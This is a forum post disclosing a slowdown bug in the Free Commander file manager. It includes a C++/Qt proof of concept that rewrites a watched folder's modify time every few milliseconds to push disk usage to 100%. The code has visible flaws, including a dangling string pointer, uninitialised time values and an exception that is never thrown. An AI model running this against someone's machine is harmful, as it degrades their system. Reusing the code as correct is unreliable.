Vurneability from malicious programs in Windows
Posted: 22.11.2016, 18:32
Free Commander is sensitive with malicious programs. This is not happen in Total Commander nor M$ Explorer. Attack is simple:
1) find out what directory user browse in FC
2) change fast modify date periodically for some file or directory in directory found in 1)
Then disk usage grow to 100% and whole system slow down noticeably.
Sample code is as follow (it is Qt5.6.1 and VC++14 program, 64bit):
Note: Directory name in gSetFileTime is hadrwirtten due to some strange problems with conversion between QString and LPCWSTR.
1) find out what directory user browse in FC
2) change fast modify date periodically for some file or directory in directory found in 1)
Then disk usage grow to 100% and whole system slow down noticeably.
Sample code is as follow (it is Qt5.6.1 and VC++14 program, 64bit):
Code: Select all
#include <QFileInfo>
#include <QtCore/qt_windows.h>
#include <exception>
#include <QTextStream>
#include <QDateTime>
#include <QThread>
void gSetFileTime(QString aPathToFile, QDateTime aCreateTime, QDateTime aModifyTime, QDateTime aAccessTime)
{
FILETIME pmodifiedtime, pcreationtime, paccesstime;
HANDLE hfile;
LPCWSTR filename = aPathToFile.toStdWString().c_str();
QFileInfo lFileInfo(aPathToFile);
if(lFileInfo.isDir())
hfile=CreateFile(L"c:\\!-sciagniete",GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS,NULL);
else
hfile=CreateFile(filename,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(hfile==INVALID_HANDLE_VALUE) throw std::exception("File open failed!");
else
{
if(!aCreateTime.isNull())
{
LONGLONG ll = Int32x32To64(aCreateTime.toTime_t(), 10000000) + 116444736000000000;
pcreationtime.dwLowDateTime = (DWORD) ll;
pcreationtime.dwHighDateTime = ll >> 32;
}
if(!aModifyTime.isNull())
{
LONGLONG ll2 = Int32x32To64(aModifyTime.toTime_t(), 10000000) + 116444736000000000;
pmodifiedtime.dwLowDateTime = (DWORD) ll2;
pmodifiedtime.dwHighDateTime = ll2 >> 32;
}
if(!aAccessTime.isNull())
{
LONGLONG ll3 = Int32x32To64(aAccessTime.toTime_t(), 10000000) + 116444736000000000;
paccesstime.dwLowDateTime = (DWORD) ll3;
paccesstime.dwHighDateTime = ll3 >> 32;
}
if(!SetFileTime(hfile, &pcreationtime, &paccesstime, &pmodifiedtime))
std::exception("Unable to set Date And Time!!!");
}
CloseHandle(hfile);
}
int main(int argc, char *argv[])
{
QString lDirName("c:\\!-sciagniete");
QTextStream lOut(stdout);
QDateTime lDate(QFileInfo(lDirName).lastModified());
qint64 lCounter(0);
try
{
lOut << "Start annoying commander." << endl;
while(true)
{
++lCounter;
gSetFileTime(lDirName, lDate.addSecs(lCounter), QDateTime(), QDateTime());
QThread::msleep(5);
//lOut << "\r" << lCounter;
}
}
catch(std::exception& aEx)
{
QTextStream lErr(stderr);
lErr << "Exception occurss!!! Exception message: " << aEx.what() << endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;
}